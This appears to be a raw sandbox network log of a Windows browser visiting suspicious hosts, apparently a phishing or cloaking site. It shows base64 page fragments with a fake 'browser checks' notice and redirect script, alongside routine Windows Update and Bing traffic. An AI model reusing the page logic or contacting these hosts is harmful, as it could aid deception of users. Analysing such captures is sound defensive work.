2024-02-26 17:12:49 UTC	1369	IN	Data Raw: 73 61 57 35 6c 44 51 70 39 44 51 6f 4e 43 69 4e 58 64 6b 31 75 56 46 56 73 56 6b 68 61 49 47 67 30 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 69 34 31 63 6d 56 74 4f 32 5a 76 62 6e 51 74 64 32 56 70 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 31 64 32 54 57 35 55 56 57 78 57 53 46 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 31 64 32 54 57 35 55 56 57 78 57 53 46 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 Data Ascii: saW5lDQp9DQoNCiNXdk1uVFVsVkhaIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI1d2TW5UVWxWSFogaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI1d2TW5UVWxWSFogaDR7Zm9udC1zaXplOjEuNXJlbT
2024-02-26 17:12:49 UTC	1369	IN	Data Raw: 4d 43 34 31 63 6d 56 74 49 57 6c 74 63 47 39 79 64 47 46 75 64 44 74 39 44 51 6f 6a 56 33 5a 4e 62 6c 52 56 62 46 5a 49 57 69 41 75 61 44 51 67 65 32 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 59 32 46 73 59 79 67 75 4f 54 41 77 63 6d 56 74 49 43 73 67 4c 6a 4e 32 64 79 6b 37 66 51 30 4b 49 31 64 32 54 57 35 55 56 57 78 57 53 46 6f 67 4c 6d 70 31 63 33 52 70 5a 6e 6b 74 59 32 39 75 64 47 56 75 64 43 31 6a 5a 57 35 30 5a 58 4a 37 61 6e 56 7a 64 47 6c 6d 65 53 31 6a 62 32 35 30 5a 57 35 30 4f 6d 4e 6c 62 6e 52 6c 63 69 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 66 51 30 4b 49 31 64 32 54 57 35 55 56 57 78 57 53 46 6f 75 62 58 51 74 4e 58 74 74 59 58 4a 6e 61 57 34 74 64 47 39 77 4f 6a 4e 79 5a 57 30 68 61 57 31 77 62 33 4a 30 59 57 35 30 4f 33 30 4e 43 69 4e Data Ascii: MC41cmVtIWltcG9ydGFudDt9DQojV3ZNblRVbFZIWiAuaDQge2ZvbnQtc2l6ZTogY2FsYyguOTAwcmVtICsgLjN2dyk7fQ0KI1d2TW5UVWxWSFogLmp1c3RpZnktY29udGVudC1jZW50ZXJ7anVzdGlmeS1jb250ZW50OmNlbnRlciFpbXBvcnRhbnQ7fQ0KI1d2TW5UVWxWSFoubXQtNXttYXJnaW4tdG9wOjNyZW0haW1wb3J0YW50O30NCiN
2024-02-26 17:12:49 UTC	1369	IN	Data Raw: 53 38 31 4d 7a 63 75 4d 7a 59 69 50 67 30 4b 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6d 31 30 4c 54 49 67 64 47 56 34 64 43 31 6a 5a 57 35 30 5a 58 49 69 49 47 6c 6b 50 53 4a 76 51 32 74 45 62 46 52 72 65 57 6c 59 49 6a 34 4e 43 6e 52 6f 61 58 4d 67 63 47 46 6e 5a 53 42 70 63 79 42 79 64 57 35 75 61 57 35 6e 49 47 4a 79 62 33 64 7a 5a 58 49 67 59 32 68 6c 59 32 74 7a 49 48 52 76 49 47 56 75 63 33 56 79 5a 53 42 35 62 33 56 79 49 48 4e 6c Data Ascii: S81MzcuMzYiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9Im10LTIgdGV4dC1jZW50ZXIiIGlkPSJvQ2tEbFRreWlYIj4NCnRoaXMgcGFnZSBpcyBydW5uaW5nIGJyb3dzZXIgY2hlY2tzIHRvIGVuc3VyZSB5b3VyIHNl
2024-02-26 17:12:49 UTC	591	IN	Data Raw: 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 6c 63 6e 4a 76 63 69 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6d 68 79 5a 57 59 67 50 53 41 6e 4c 30 4a 43 55 45 51 78 4d 45 74 4b 4e 45 4e 50 55 31 49 79 53 6a 6b 79 52 45 31 61 53 46 42 43 4d 6b 70 4c 55 54 6c 51 57 43 31 78 62 47 6c 6c 65 6d 5a 78 4e 44 5a 6e 62 6d 67 74 5a 47 6c 7a 64 44 4d 78 62 7a 5a 6b 64 7a 41 2f 56 45 49 31 4e 45 4e 53 51 7a 56 51 52 46 4a 48 55 55 39 47 54 Data Ascii: AgICBsb2NhdGlvbi5yZWxvYWQoKTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdlcnJvcicpew0KICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnL0JCUEQxMEtKNENPU1IySjkyRE1aSFBCMkpLUTlQWC1xbGllemZxNDZnbmgtZGlzdDMxbzZkdzA/VEI1NENSQzVQRFJHUU9GT
2024-02-26 17:12:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	104.21.20.153	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:50 UTC	561	OUT	GET / HTTP/1.1 Host: nvohxxicwod.trcvtoke.ru Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://horizon.sologerg.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://horizon.sologerg.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:51 UTC	622	IN	HTTP/1.1 200 OK Date: Mon, 26 Feb 2024 17:12:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PjiWCExmbVzXoCvg%2F8%2FbWTWJfvEe38PFgjRYpRzReb6MNcQaY5EeVdZW9dM0W3%2FrdJxXmOuq6D5swjsABWsPUGXn07yAq9O5wvvmGib2mHvn94RjBOsa6n7ZFVp520DoECDuP%2BQNB2N9dg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 85b9d0b7de395b4d-IAD alt-svc: h3=":443"; ma=86400
2024-02-26 17:12:51 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2024-02-26 17:12:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49722	104.21.20.93	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:51 UTC	1535	OUT	GET /BBPD10KJ4COSR2J92DMZHPB2JKQ9PX-qliezfq46gnh-dist31o6dw0?TB54CRC5PDRGQOFM023B80CHXA9BS0-sdk22iw1h43e-lfztdonl8mj0qo HTTP/1.1 Host: horizon.sologerg.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://horizon.sologerg.com/hihihji/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: XSRF-TOKEN=eyJpdiI6IkZpZWtES3BFdzhRQysxUUMzUHVEeXc9PSIsInZhbHVlIjoibWkvbWxyeHlPR2VFN2ZhSzBUZC80NVc2WkxoWHJpem1jQU94V1BXMFM1SlRvTHZFY3pNVU9iY1JKdFNsaVNWTzVOUVQvKzRra0NPdlpFcHhoZkZ0NjJHVC9KcmlhNXlkbEQ1Y1dBK1lsY0RweFR4S1hNcFlza1NoQnJGcHlEZVYiLCJtYWMiOiI3YTA0ODQ2Njk5ODE5OGU0MzA3ODdlZjVlYmMyNDEwZWMxZmNjNTk2OWEwNDBmYmM3MTdhMzEwYzVkZTZjNWQwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Img3Q3c2YWlUcnV0eDhmYStUUStEbVE9PSIsInZhbHVlIjoiSDVHcUFMcXpEbWNDQWVKZ3NObU9LdEVTYWdManhtTStkZVU4TDNkTG1lenZVamZ1T0FLdklZMkZldTF6S2hUUWk1bXU4dWd5Y1hkNGY3NEdNUDA2bzQvL3V6cTdCRSttamlKSmt0QnUrdUlOQ1BadnNrVGtYN09IRmo0c1ZjYW0iLCJtYWMiOiI3MmFjOGNjZjljZmU1ZTZkMjgzOWQyYjJiM2IzMGVhNWZjOGVhMzBiYzAwOWI2ODE4M2MwNmViNjRhYTlmMjNlIiwidGFnIjoiIn0%3D
2024-02-26 17:12:54 UTC	669	IN	HTTP/1.1 404 Not Found Date: Mon, 26 Feb 2024 17:12:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rxg2wLNOqsUkNdECmNqpR0ejq5GBwBzX%2BnW5Q7lkAXEuqaE4BPWmxV2h%2BfanqVw6lfP4f3ZraHDprxL8D3yui5pf6NjYjS8oeB2uOTeM4MCTB046ZCaTWR8CvXL%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 Server: cloudflare CF-RAY: 85b9d0bc5d633b92-IAD
2024-02-26 17:12:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49726	172.67.193.41	443	2148	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:52 UTC	347	OUT	GET / HTTP/1.1 Host: nvohxxicwod.trcvtoke.ru Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-02-26 17:12:53 UTC	624	IN	HTTP/1.1 200 OK Date: Mon, 26 Feb 2024 17:12:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RbXd%2B5knglWFlhs3J3dtPiZ4uGSLLJZWZGB2ZUK3%2B3xkpcNsxPt%2FYJ2MtXpM4zLJDQj9VAVkfijxmeZfWkPBoDp6Y0c%2BmMhXCZ1EJASgS6dNMbG8SSkhKBOhe%2FlIMUDGffamNBhru8FrwQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 85b9d0bfcb370641-IAD alt-svc: h3=":443"; ma=86400
2024-02-26 17:12:53 UTC	6	IN	Data Raw: 31 0d 0a 31 0d 0a Data Ascii: 11
2024-02-26 17:12:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49732	40.127.169.103	443

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:56 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mzVhl74nkCCh8Eb&MD=PWmU1UxS HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-02-26 17:12:56 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 4f24653b-06ca-4bf4-83db-263aa18eb37e MS-RequestId: 5497022e-9fe4-4f55-b396-9fd2749f1768 MS-CV: u/oPGVkKyk6eeDG/.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Mon, 26 Feb 2024 17:12:55 GMT Connection: close Content-Length: 24490
2024-02-26 17:12:56 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-02-26 17:12:56 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.5	49735	23.1.237.91	443

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:12:57 UTC	2148	OUT	POST /threshold/xls.aspx HTTP/1.1 Origin: https://www.bing.com Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init Accept: / Accept-Language: en-CH Content-type: text/xml X-Agent-DeviceId: 01000A410900D492 X-BM-CBT: 1696428841 X-BM-DateFormat: dd/MM/yyyy X-BM-DeviceDimensions: 784x984 X-BM-DeviceDimensionsLogical: 784x984 X-BM-DeviceScale: 100 X-BM-DTZ: 120 X-BM-Market: CH X-BM-Theme: 000000;0078d7 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22 X-Device-isOptin: false X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-Device-OSSKU: 48 X-Device-Touch: false X-DeviceID: 01000A410900D492 X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh X-MSEdge-ExternalExpType: JointCoord X-PositionerType: Desktop X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time X-UserAgeClass: Unknown Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Content-Length: 2484 Connection: Keep-Alive Cache-Control: no-cache Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1708967543018&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-02-26 17:12:57 UTC	1	OUT	Data Raw: 3c Data Ascii: <
2024-02-26 17:12:57 UTC	2483	OUT	Data Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49 Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-02-26 17:12:57 UTC	476	IN	HTTP/1.1 204 No Content Access-Control-Allow-Origin: * Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 4AB4958D47D0479BB4C4799BC92F7A3F Ref B: CO1EDGE2707 Ref C: 2024-02-26T17:12:57Z Date: Mon, 26 Feb 2024 17:12:57 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.57ed0117.1708967577.146080d8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49739	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-02-26 17:13:34 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=mzVhl74nkCCh8Eb&MD=PWmU1UxS HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-02-26 17:13:34 UTC	547	IN	HTTP/1.1 200 OK Connection: close Date: Mon, 26 Feb 2024 17:13:33 GMT Content-Type: application/octet-stream Content-Length: 25457 Cache-Control: no-cache Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" SLSVersion: 2.0 MS-CorrelationId: a88ec4c3-3818-45bc-bfd9-9102e5ce955c MS-RequestId: 6ade7ec1-070c-4c93-ac06-edb7b8df4c6b MS-CV: Dkii7KU8d0a7gGEA.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab; filename*=UTF-8''environment.cab
2024-02-26 17:13:34 UTC	3549	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-02-26 17:13:34 UTC	4096	IN	Data Raw: 7a 54 86 0f 86 12 64 49 99 99 75 ab 35 59 e4 33 70 28 77 00 47 75 fd 2b 71 e1 70 28 12 47 95 0b d6 65 7e 97 7b a0 8a 05 ab a2 60 50 f8 2f 73 0f 38 e8 61 7c 92 2f 87 49 01 45 a4 e3 a0 aa 20 6d 15 c1 06 59 90 9b 3f 4f 1d 6c 4a 0c 87 fe 24 75 40 15 29 c5 42 5d 9b 84 eb 17 99 83 ba 94 7a 3e 38 22 b1 f2 ee c5 e5 a1 85 5b 19 45 04 c4 67 e4 cd 61 f8 47 9a 1a 1c c7 6c f7 50 81 4a 56 0a 10 43 82 fe 95 28 12 25 21 24 05 88 9a 01 04 e0 0b 02 61 d0 c5 74 ec c3 6c 6c 2f 80 ed fe 53 c4 e6 0f 84 7e dc 00 e7 76 57 26 43 07 6b 67 3b 4f 56 43 03 03 56 65 03 6d 69 05 a4 82 84 a0 8a b8 84 8a a0 8a b2 22 0a c9 05 70 6c 4b 22 e3 b7 29 0d d1 2e 76 82 06 18 6b 17 77 56 03 3b 8f 93 68 1b bb 74 1c 39 3b e8 1d 2f 01 38 f8 c8 0e 0f b9 af 66 c2 cc a5 c5 7c af f7 96 5c f6 fd e8 21 9f Data Ascii: zTdIu5Y3p(wGu+qp(Ge~{`P/s8a\|/IE mY?OlJ$u@)B]z>8"[EgaGlPJVC(%!$atll/S~vW&Ckg;OVCVemi"plK").vkwV;ht9;/8f\|\!
2024-02-26 17:13:34 UTC	4096	IN	Data Raw: 90 ca ab b6 f2 7a 3f 75 c8 3c 64 c2 ec fa 55 6f cc fe ea 5d 91 65 a4 5a f2 6c 45 21 b5 f2 97 9c c2 09 0c 9f d0 b2 a1 25 d4 d2 90 f6 c6 d7 74 bc 03 cf d7 9f bc eb 9c a6 5d 73 a7 31 2d fa 9e c4 cd 76 49 6c d5 b3 2a 5d be 0f af 47 a8 9a 88 0d 9c a6 ae db be 7b df d8 f4 56 91 9a 19 db 53 af 4d f3 6b e8 34 ef e4 db a9 f7 77 7b b5 8a 5d db 87 f9 13 1a 91 cd 6b 83 27 ff 41 a7 bf a1 d3 e7 17 ad cf 06 e1 1d 73 ee a0 06 25 7d 96 0b ee ec 51 26 3c a4 35 9b 40 1a 34 15 a9 a9 03 69 e7 3d 93 7e 30 d4 63 26 4f 5f 8a 63 36 ef be 41 d1 83 06 3c bd c3 9a 87 39 6f be 94 63 2c 84 31 85 60 cb b2 79 83 e6 bc 2c ca e5 e1 5c 3c 74 5c 16 71 3e 6f 47 6c 34 8c dc f0 ce 10 c7 b4 f8 e2 97 ac 7c 52 ad 7d 37 33 50 af 12 f7 38 91 5a fe 88 44 9c ef 06 c7 7b 41 b9 c4 62 d8 6a d7 e9 32 b2 Data Ascii: z?u<dUo]eZlE!%t]s1-vIl*]G{VSMk4w{]k'As%}Q&<5@4i=~0c&O_c6A<9oc,1`y,\<t\q>oGl4\|R}73P8ZD{Abj2
